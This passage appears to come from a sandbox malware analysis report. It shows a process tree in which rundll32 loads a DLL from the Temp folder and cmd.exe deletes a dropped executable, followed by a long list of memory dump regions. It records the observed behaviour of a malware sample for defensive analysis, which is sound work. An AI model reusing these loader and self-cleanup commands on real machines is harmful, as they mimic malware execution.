                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                              1⤵
                                                                                                                              • Process spawned unexpected child process
                                                                                                                              PID:4188
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                2⤵
                                                                                                                                  PID:4208
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                1⤵
                                                                                                                                  PID:4348
                                                                                                                                • C:\Windows\SysWOW64\control.exe
                                                                                                                                  "C:\Windows\SysWOW64\control.exe"
                                                                                                                                  1⤵
                                                                                                                                    PID:1956
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /c del "C:\Users\Admin\Pictures\Adobe Films\tfugKKePr2LiLXXzD0UhT8At.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:4916

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • memory/352-308-0x000001DB0F240000-0x000001DB0F2B2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/484-309-0x00000210D57D0000-0x00000210D5842000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/816-381-0x0000000002160000-0x0000000002235000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      852KB

                                                                                                                                    • memory/816-382-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      864KB

                                                                                                                                    • memory/816-378-0x00000000020E0000-0x000000000215B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      492KB

                                                                                                                                    • memory/956-347-0x0000000000B60000-0x0000000000B61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1076-303-0x00000250E6D80000-0x00000250E6DF2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/1100-416-0x00000000007D0000-0x00000000007E1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      68KB

                                                                                                                                    • memory/1100-411-0x0000000000C30000-0x0000000000F50000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.1MB

                                                                                                                                    • memory/1116-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.5MB

                                                                                                                                    • memory/1116-144-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.5MB

                                                                                                                                    • memory/1116-140-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      100KB

                                                                                                                                    • memory/1116-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      572KB

                                                                                                                                    • memory/1116-137-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      572KB

                                                                                                                                    • memory/1116-145-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      152KB

                                                                                                                                    • memory/1116-135-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      100KB

                                                                                                                                    • memory/1116-141-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.5MB

                                                                                                                                    • memory/1116-143-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.5MB

                                                                                                                                    • memory/1116-138-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      572KB

                                                                                                                                    • memory/1116-139-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      100KB

                                                                                                                                    • memory/1116-136-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      100KB

                                                                                                                                    • memory/1144-233-0x0000000005CE0000-0x0000000005CE1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-238-0x0000000005DB3000-0x0000000005DB4000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-234-0x0000000005DB0000-0x0000000005DB1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-221-0x0000000000400000-0x00000000016E0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      18.9MB

                                                                                                                                    • memory/1144-241-0x0000000005DB4000-0x0000000005DB6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1144-223-0x0000000003550000-0x000000000356F000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      124KB

                                                                                                                                    • memory/1144-235-0x0000000005D60000-0x0000000005D61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-226-0x0000000003760000-0x000000000377D000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      116KB

                                                                                                                                    • memory/1144-236-0x0000000005DB2000-0x0000000005DB3000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-228-0x00000000062C0000-0x00000000062C1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-218-0x00000000032F0000-0x0000000003320000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      192KB

                                                                                                                                    • memory/1144-230-0x0000000005CB0000-0x0000000005CB1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1144-231-0x00000000068D0000-0x00000000068D1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1224-329-0x000002C8643B0000-0x000002C864422000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/1256-331-0x0000023FCF420000-0x0000023FCF492000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/1316-205-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1316-200-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1388-315-0x00000166467C0000-0x0000016646832000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/1508-393-0x00000000772E0000-0x000000007746E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.6MB

                                                                                                                                    • memory/1508-407-0x0000000005440000-0x0000000005441000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1824-327-0x000001E878140000-0x000001E8781B2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/1956-432-0x0000000001350000-0x0000000001370000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      128KB

                                                                                                                                    • memory/2220-284-0x000000007EDA0000-0x000000007EDA1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-259-0x0000000000B60000-0x0000000000B61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-274-0x00000000089F0000-0x0000000008A23000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      204KB

                                                                                                                                    • memory/2220-194-0x0000000006750000-0x0000000006751000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-201-0x0000000006752000-0x0000000006753000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-222-0x0000000006B60000-0x0000000006B61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-225-0x0000000006C00000-0x0000000006C01000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-190-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-184-0x0000000000B60000-0x0000000000B61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-179-0x0000000000B60000-0x0000000000B61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-196-0x0000000006D90000-0x0000000006D91000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-240-0x0000000007810000-0x0000000007811000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-229-0x00000000074C0000-0x00000000074C1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2220-227-0x0000000007430000-0x0000000007431000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2224-254-0x0000000005FF0000-0x000000000613C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.3MB

                                                                                                                                    • memory/2392-314-0x0000027EF2740000-0x0000027EF27B2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/2420-312-0x000001CAEB520000-0x000001CAEB592000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/2588-306-0x000002645C6C0000-0x000002645C732000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/2588-304-0x000002645C600000-0x000002645C64D000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      308KB

                                                                                                                                    • memory/2688-202-0x0000000005270000-0x0000000005271000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2688-215-0x00000000058D0000-0x00000000058D1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2688-210-0x0000000005240000-0x0000000005241000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2688-213-0x0000000005360000-0x0000000005361000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2688-186-0x0000000000A60000-0x0000000000A61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2692-332-0x000001D82E100000-0x000001D82E172000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/2708-330-0x0000017850F40000-0x0000017850FB2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/2816-220-0x0000000000400000-0x00000000016E0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      18.9MB

                                                                                                                                    • memory/2816-216-0x0000000001820000-0x000000000196A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.3MB

                                                                                                                                    • memory/3020-268-0x00000000005C0000-0x00000000005D5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      84KB

                                                                                                                                    • memory/3020-422-0x0000000006430000-0x00000000065B8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.5MB

                                                                                                                                    • memory/3208-217-0x0000000001730000-0x0000000001739000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      36KB

                                                                                                                                    • memory/3208-219-0x0000000000400000-0x00000000016CA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      18.8MB

                                                                                                                                    • memory/3208-195-0x00000000018F8000-0x0000000001909000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      68KB

                                                                                                                                    • memory/3628-385-0x0000000000400000-0x0000000000461000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      388KB

                                                                                                                                    • memory/3628-383-0x00000000005C0000-0x00000000005E7000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      156KB

                                                                                                                                    • memory/3628-384-0x00000000020E0000-0x0000000002124000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      272KB

                                                                                                                                    • memory/3800-214-0x000000001BBA0000-0x000000001BBA2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/3800-209-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3888-257-0x0000000002BC0000-0x0000000002BC1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3888-258-0x0000000002BC0000-0x0000000002BC1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4004-212-0x000000001AE60000-0x000000001AE62000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4004-203-0x0000000000950000-0x0000000000951000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4004-182-0x0000000000230000-0x0000000000231000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4008-252-0x0000000005330000-0x0000000005936000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.0MB

                                                                                                                                    • memory/4008-237-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/4024-438-0x00000000029A0000-0x00000000029A1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4024-436-0x00000000009D0000-0x0000000000A7E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      696KB

                                                                                                                                    • memory/4208-300-0x0000000004D2A000-0x0000000004E2B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/4208-302-0x0000000004E70000-0x0000000004ECD000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      372KB

                                                                                                                                    • memory/4308-374-0x0000000005EB0000-0x0000000005EB1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4308-359-0x00000000772E0000-0x000000007746E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.6MB

                                                                                                                                    • memory/4348-421-0x0000023C55900000-0x0000023C55A05000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/4348-420-0x0000023C54930000-0x0000023C5494B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      108KB

                                                                                                                                    • memory/4348-310-0x0000023C530D0000-0x0000023C53142000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      456KB

                                                                                                                                    • memory/4648-423-0x00000000001E0000-0x00000000001E9000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      36KB

                                                                                                                                    • memory/4648-427-0x0000000000400000-0x0000000002B40000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      39.2MB

                                                                                                                                    • memory/4928-434-0x0000000000400000-0x0000000002B5B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      39.4MB

                                                                                                                                    • memory/4928-426-0x0000000002BB0000-0x0000000002CFA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.3MB

                                                                                                                                    • memory/5028-429-0x0000000000450000-0x000000000059A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.3MB

                                                                                                                                    • memory/5028-430-0x0000000000450000-0x000000000059A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.3MB